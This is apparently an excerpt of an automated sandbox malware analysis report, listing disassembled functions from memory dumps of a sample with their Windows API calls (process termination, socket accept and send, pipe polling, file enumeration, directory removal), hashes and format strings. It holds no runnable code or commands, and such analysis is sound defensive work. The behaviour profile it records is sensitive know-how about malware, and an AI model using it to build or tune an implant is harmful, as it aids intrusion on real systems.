Opcode ID: 0c7d2ad69279c739a0d569e9c8e7f1d35e59de704b8391257e7275e1388a53e1
Instruction ID: ed837f09bb8ac4ae929274721659c03998681d3efc7578a3edce30c707a2803d
Opcode Fuzzy Hash: 0c7d2ad69279c739a0d569e9c8e7f1d35e59de704b8391257e7275e1388a53e1
Instruction Fuzzy Hash: 6901497A0042126EDB0AFF25DC88ABE3B6ECBC37D4B18005DF9498F261D927D58AC650

Function 03D78EF1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000001,00000000,00000000), ref: 03D78F28
TerminateProcess.KERNEL32(00000000,00000000), ref: 03D78F37
GetLastError.KERNEL32 ref: 03D78F41
CloseHandle.KERNEL32(00000000), ref: 03D78F54

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate
String ID:
API String ID: 4043475357-0
Opcode ID: 009eee7c1fb1e9e7d3f168c9882920ffe26a312ed492e692cd159b647562509a
Instruction ID: f481e8b9b8a26ea7e3252cc3e0cbe204860c5d9796b1391b83fc217816e73be8
Opcode Fuzzy Hash: 009eee7c1fb1e9e7d3f168c9882920ffe26a312ed492e692cd159b647562509a
Instruction Fuzzy Hash: ECF0A4729006157FEB107BA4DC0AFAFBB7CEF45B14F040415F904E9180F770961996A5

Function 03D717AF Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 03D717BA

Part of subcall function 03D85C9D: __vscwprintf_helper.LIBCMT ref: 03D85CAF

_malloc.LIBCMT ref: 03D717CD

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

_vswprintf_s.LIBCMT ref: 03D717E1

Part of subcall function 03D85C29: __vsprintf_s_l.LIBCMT ref: 03D85C3C

_memset.LIBCMT ref: 03D717F4

Part of subcall function 03D857F0: __lock.LIBCMT ref: 03D8580E
Part of subcall function 03D857F0: ___sbh_find_block.LIBCMT ref: 03D85819
Part of subcall function 03D857F0: ___sbh_free_block.LIBCMT ref: 03D85828
Part of subcall function 03D857F0: HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
Part of subcall function 03D857F0: GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 3037472818-0
Opcode ID: fe603677fc4d5f6a1061b61dba0d373dc5132e7d8e99c1440cc36473ff34bbd6
Instruction ID: 05ddb2a4b8ecfab2598ae77b7f30af2ad59fbf2a398a6bc4323780b409aea94d
Opcode Fuzzy Hash: fe603677fc4d5f6a1061b61dba0d373dc5132e7d8e99c1440cc36473ff34bbd6
Instruction Fuzzy Hash: D8F0BE7F0003197AD721FB64EC80EFF7B6EDF866A4F14451AF9189A040EA32B91496B4

Function 03970BFD Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 03970C08

Part of subcall function 039850EB: __vscwprintf_helper.LIBCMT ref: 039850FD

_malloc.LIBCMT ref: 03970C1B

Part of subcall function 03984D1B: __FF_MSGBANNER.LIBCMT ref: 03984D3E
Part of subcall function 03984D1B: __NMSG_WRITE.LIBCMT ref: 03984D45

_vswprintf_s.LIBCMT ref: 03970C2F

Part of subcall function 03985077: __vsprintf_s_l.LIBCMT ref: 0398508A

_memset.LIBCMT ref: 03970C42

Part of subcall function 03984C3E: __lock.LIBCMT ref: 03984C5C
Part of subcall function 03984C3E: ___sbh_find_block.LIBCMT ref: 03984C67
Part of subcall function 03984C3E: ___sbh_free_block.LIBCMT ref: 03984C76

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 104857598-0
Opcode ID: 7e23059bafbd4798591d7a3db8c69f66bc45552909d126080f5a0c3be064c3af
Instruction ID: 0583fc0ba2f642e3d6252f0739e431e9bc32ed24d0bd0d05d76679267e8704ac
Opcode Fuzzy Hash: 7e23059bafbd4798591d7a3db8c69f66bc45552909d126080f5a0c3be064c3af
Instruction Fuzzy Hash: E5F0B47B00031D7AD711FF54DC80EFF775DDFC26A4F144019F90999140DA22991597B0

Function 03970BFC Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 03970C08

Part of subcall function 039850EB: __vscwprintf_helper.LIBCMT ref: 039850FD

_malloc.LIBCMT ref: 03970C1B

Part of subcall function 03984D1B: __FF_MSGBANNER.LIBCMT ref: 03984D3E
Part of subcall function 03984D1B: __NMSG_WRITE.LIBCMT ref: 03984D45

_vswprintf_s.LIBCMT ref: 03970C2F

Part of subcall function 03985077: __vsprintf_s_l.LIBCMT ref: 0398508A

_memset.LIBCMT ref: 03970C42

Part of subcall function 03984C3E: __lock.LIBCMT ref: 03984C5C
Part of subcall function 03984C3E: ___sbh_find_block.LIBCMT ref: 03984C67
Part of subcall function 03984C3E: ___sbh_free_block.LIBCMT ref: 03984C76

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 104857598-0
Opcode ID: 1bb1d992bc75502e6dc67085cc0de012dfbb7ee066a9db04eaf9479d6a938439
Instruction ID: 3179a22b9a2a15e347f5123c08fed226e1dd74c8386b2079c6e99f194eaaade5
Opcode Fuzzy Hash: 1bb1d992bc75502e6dc67085cc0de012dfbb7ee066a9db04eaf9479d6a938439
Instruction Fuzzy Hash: 06F0907B00021D7AD721BF649C80EFF7B6DEFC22A4F244119F90999140DA2299159BB0

Function 03D7BF53 Relevance: 6.0, APIs: 4, Instructions: 40networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,00000000,00000000), ref: 03D7BF61
send.WS2_32(00000000,?,?,00000000), ref: 03D7BF8E
send.WS2_32(00000000,?,?,00000000), ref: 03D7BF9C
closesocket.WS2_32(00000000), ref: 03D7BFA7

Part of subcall function 03D7BEE3: closesocket.WS2_32(?), ref: 03D7BEE5

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: closesocketsend$accept
String ID:
API String ID: 2168303407-0
Opcode ID: 0832eaafc8164329f4ad01f3d6b0101f694730f3ee2aca04a344a6ef3b49bb28
Instruction ID: 1bee2925db9d605c230c069688495805b94ca997139f2a5aaba95f473631e116
Opcode Fuzzy Hash: 0832eaafc8164329f4ad01f3d6b0101f694730f3ee2aca04a344a6ef3b49bb28
Instruction Fuzzy Hash: DBF0903A140704BAEB31BAF4EC41F46F76DEB08A20F504A0BF656992919672A4029B60

Function 03D77E86 Relevance: 6.0, APIs: 4, Instructions: 39memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32(00000000,03D77F29,00000000,00000000,03D78ED8,?,03D78ED8,?,?,03D77F29,00000000,?), ref: 03D77EA1
GetProcessHeap.KERNEL32(00000000,00000000,?,?,03D77F29,00000000,?), ref: 03D77EA7
HeapAlloc.KERNEL32(00000000,?,?,03D77F29,00000000,?), ref: 03D77EAE
InitializeProcThreadAttributeList.KERNEL32(00000000,03D77F29,00000000,00000000,?,?,03D77F29,00000000,?), ref: 03D77EC3

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 341d6f180242f35361eda4bf06898f29e37424010d693682b60c88659a48d620
Instruction ID: 746f1157be4f3cda8c39ee6ecd942f5b399a9ef31a083ab5fd5db90c00220341
Opcode Fuzzy Hash: 341d6f180242f35361eda4bf06898f29e37424010d693682b60c88659a48d620
Instruction Fuzzy Hash: A8F05E7B600119BB9B11DBE5DD88CAF7EBDDB8AA507100826F601D2100E6319A00EB70

Function 03D76165 Relevance: 6.0, APIs: 4, Instructions: 35sleeppipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D76177
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,03D762A3,00000000), ref: 03D7618B
Sleep.KERNEL32(000001F4,?,00000000,00000000,?,?,03D762A3,00000000), ref: 03D7619F
GetTickCount.KERNEL32 ref: 03D761A5

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: d9d02bffa8534c4417d599929f895c2bb2d4aad2f783917845a3e925ea431fc1
Instruction ID: 6d6d05d15a287064b70c1312ce014f36439657aa7ddf99c2cd674c506aacd056
Opcode Fuzzy Hash: d9d02bffa8534c4417d599929f895c2bb2d4aad2f783917845a3e925ea431fc1
Instruction Fuzzy Hash: 60F0A77250011DBFEB00DF94DC88CAFB7ACDB449957140437F901E2101F670DD445760

Function 03D8F04D Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03D8F059

Part of subcall function 03D8A735: __getptd_noexit.LIBCMT ref: 03D8A738
Part of subcall function 03D8A735: __amsg_exit.LIBCMT ref: 03D8A745

__getptd.LIBCMT ref: 03D8F070
__amsg_exit.LIBCMT ref: 03D8F07E
__lock.LIBCMT ref: 03D8F08E

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: ef5e536fdb2919a65f3db893934138882ce2e09c62b480397b8e4d53cb13c452
Instruction ID: bc77b2e1e90a9cbfd5b79e28264f828af7580f334cc9e3a10f872d402874534d
Opcode Fuzzy Hash: ef5e536fdb2919a65f3db893934138882ce2e09c62b480397b8e4d53cb13c452
Instruction Fuzzy Hash: 01F0303A910B00CFD720FBB5A905B4D73B4EF04B10FA54959D454AF281DB34B5559BA2

Function 0398E49B Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0398E4A7

Part of subcall function 03989B83: __getptd_noexit.LIBCMT ref: 03989B86
Part of subcall function 03989B83: __amsg_exit.LIBCMT ref: 03989B93

__getptd.LIBCMT ref: 0398E4BE
__amsg_exit.LIBCMT ref: 0398E4CC
__lock.LIBCMT ref: 0398E4DC

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: e1976236eb8f249a5f5dc53f8badee503464b70829c2872b799a0f0c229a3d3b
Instruction ID: 0c1692a29f3cacf35f0256104fe0253b0be1225fb29a8c02a1134e37236913e4
Opcode Fuzzy Hash: e1976236eb8f249a5f5dc53f8badee503464b70829c2872b799a0f0c229a3d3b
Instruction Fuzzy Hash: 0EF09A3AE00700CEE721FBB88800B9D73A4AFC4760F15415AD458AF290DBB49801DB92

Function 03D7AB43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 03D7AB57
__snprintf.LIBCMT ref: 03D7AB91

Strings

%c%c%c%c, xrefs: 03D7AB86

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf
String ID: %c%c%c%c
API String ID: 2633826957-103593547
Opcode ID: 9956eef8e3d0ed582c8285e1ac1a6ea669297113ae547055c5822ee0363cffb7
Instruction ID: 3a374def50dd074fa6bd108300e08f5e958c0c0bebd0a13c7f3e4d551a32c936
Opcode Fuzzy Hash: 9956eef8e3d0ed582c8285e1ac1a6ea669297113ae547055c5822ee0363cffb7
Instruction Fuzzy Hash: 8FF06D7584464A6EDF01EBA48CDAEFEBFBD9B05205F440192AA50D7042E665E34D8BA0

Function 00401BF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401C5E

Strings

Unknown error, xrefs: 00401BF2
X@@, xrefs: 00401C3F

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$X@@
API String ID: 383729395-3005984270
Opcode ID: 5244cce54ea5771f88ebda408c1227e2c747ca116834c775d4894aa994d9db1f
Instruction ID: 471e14d6d50098b96159594a15d2f21f163058108a99b2b31461caf3c7b5687f
Opcode Fuzzy Hash: 5244cce54ea5771f88ebda408c1227e2c747ca116834c775d4894aa994d9db1f
Instruction Fuzzy Hash: 6901DAB0108B45CBD300AF15E58841ABFF1FFC9354F42889DE5C4572A9CB36D8A8C746

Function 03D745F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D745FC

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

__snprintf.LIBCMT ref: 03D74610

Part of subcall function 03D86E5A: RemoveDirectoryA.KERNEL32(03D74674,?,03D74674,00000000,?,?,?,?,00000000), ref: 03D86E62
Part of subcall function 03D86E5A: GetLastError.KERNEL32(?,03D74674,00000000,?,?,?,?,00000000), ref: 03D86E6C
Part of subcall function 03D86E5A: __dosmaperr.LIBCMT ref: 03D86E7B

Strings

%s\%s, xrefs: 03D74609

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AllocateDirectoryErrorHeapLastRemove__dosmaperr__snprintf_malloc
String ID: %s\%s
API String ID: 47932920-4073750446
Opcode ID: f1ec47a544a9dd7cab2e56e82b9cd43e074d9229e9bffda0399734be8e591df4
Instruction ID: 94961d135290d1b0dacb8725d82aaa7559b6b18aab237324916f781919cc33bc
Opcode Fuzzy Hash: f1ec47a544a9dd7cab2e56e82b9cd43e074d9229e9bffda0399734be8e591df4
Instruction Fuzzy Hash: 36E0D83A40030476D622F769AC01EEF772DCF42A71F104027F908191007E71790046F7

Function 03D784E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D784EA
__snprintf.LIBCMT ref: 03D78514

Strings

%s%s: %s, xrefs: 03D7850B

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf_memset
String ID: %s%s: %s
API String ID: 2657849664-533130479
Opcode ID: 247ebbc2317e5aff88cf41684a02ff344c33195e2bb12226a1b28a437c622d94
Instruction ID: 8912ecce380d87cfe1eeb5e322e09f6818a4712a6f5f65c3c37cf734cb9965f2
Opcode Fuzzy Hash: 247ebbc2317e5aff88cf41684a02ff344c33195e2bb12226a1b28a437c622d94
Instruction Fuzzy Hash: 10F01576504214ABCB01EF60CC81E9B77BEFB8A710F400469BA415F195E636EA25DB62

Function 03D791B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D791BE

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

__snprintf.LIBCMT ref: 03D791D2

Part of subcall function 03D791F0: _malloc.LIBCMT ref: 03D791FD
Part of subcall function 03D791F0: __snprintf.LIBCMT ref: 03D7920E
Part of subcall function 03D791F0: FindFirstFileA.KERNEL32(00000000,03D7466D,?,03D792DF,03D7466D,?,03D745F1), ref: 03D7921B
Part of subcall function 03D791F0: _malloc.LIBCMT ref: 03D7925A
Part of subcall function 03D791F0: __snprintf.LIBCMT ref: 03D7926F
Part of subcall function 03D791F0: FindNextFileA.KERNEL32(000000FF,03D7466D,?,?,?,?,?,?,?), ref: 03D7929C
Part of subcall function 03D791F0: FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 03D792A9

Part of subcall function 03D857F0: __lock.LIBCMT ref: 03D8580E
Part of subcall function 03D857F0: ___sbh_find_block.LIBCMT ref: 03D85819
Part of subcall function 03D857F0: ___sbh_free_block.LIBCMT ref: 03D85828
Part of subcall function 03D857F0: HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
Part of subcall function 03D857F0: GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

Strings

%s\%s, xrefs: 03D791CB

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
String ID: %s\%s
API String ID: 1254174322-4073750446
Opcode ID: 8ac03596a586860bc71ec89d704aedc12f37b399f25051d95185badee8dda674
Instruction ID: 8340f6c22dc5e3b0474597e0d046890c0b866a05cb0df9f8ccbef65399466b02
Opcode Fuzzy Hash: 8ac03596a586860bc71ec89d704aedc12f37b399f25051d95185badee8dda674
Instruction Fuzzy Hash: 85E0863A44121876CF12BF51AC40DEF7B2EDF87560B004026FD08151109A35692167B2

Function 03D95E79 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_RTC_Failure.LIBCMT ref: 03D95E8C

Strings

abcdefghijklmnop, xrefs: 03D95E85
abcdefghijklmnop, xrefs: 03D95E86

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Failure
String ID: abcdefghijklmnop$abcdefghijklmnop
API String ID: 3995482717-935656707
Opcode ID: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
Instruction ID: 9d3807f095f07ee72feaf3ec1147ec647ab0122dfd530911f4e98fbac9132082
Opcode Fuzzy Hash: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
Instruction Fuzzy Hash: A5D0C97B20D2083EFE61E45A7D06FBB7B5DD7C1A75EA081BBF90886080A9026C2551F9

Function 03D785F5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D785FD
__snprintf.LIBCMT ref: 03D78622

Strings

%s%s, xrefs: 03D78619

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf_memset
String ID: %s%s
API String ID: 2657849664-3438391663
Opcode ID: 9b69c5ceab1c4f37eee493e5f0af691247b649fd127b84b7a0f6de5a104cef87
Instruction ID: 69c0d5a29d325ccee505a3487af19ad5709962731e0819dc4da7739152eb4d3a
Opcode Fuzzy Hash: 9b69c5ceab1c4f37eee493e5f0af691247b649fd127b84b7a0f6de5a104cef87
Instruction Fuzzy Hash: 22E01776544304BBCB10EF65CCC6E9F77BDFB8AB10F404529B6448A051E632EA188B32

Function 004022C0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022CE
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022FC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 0040231C

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
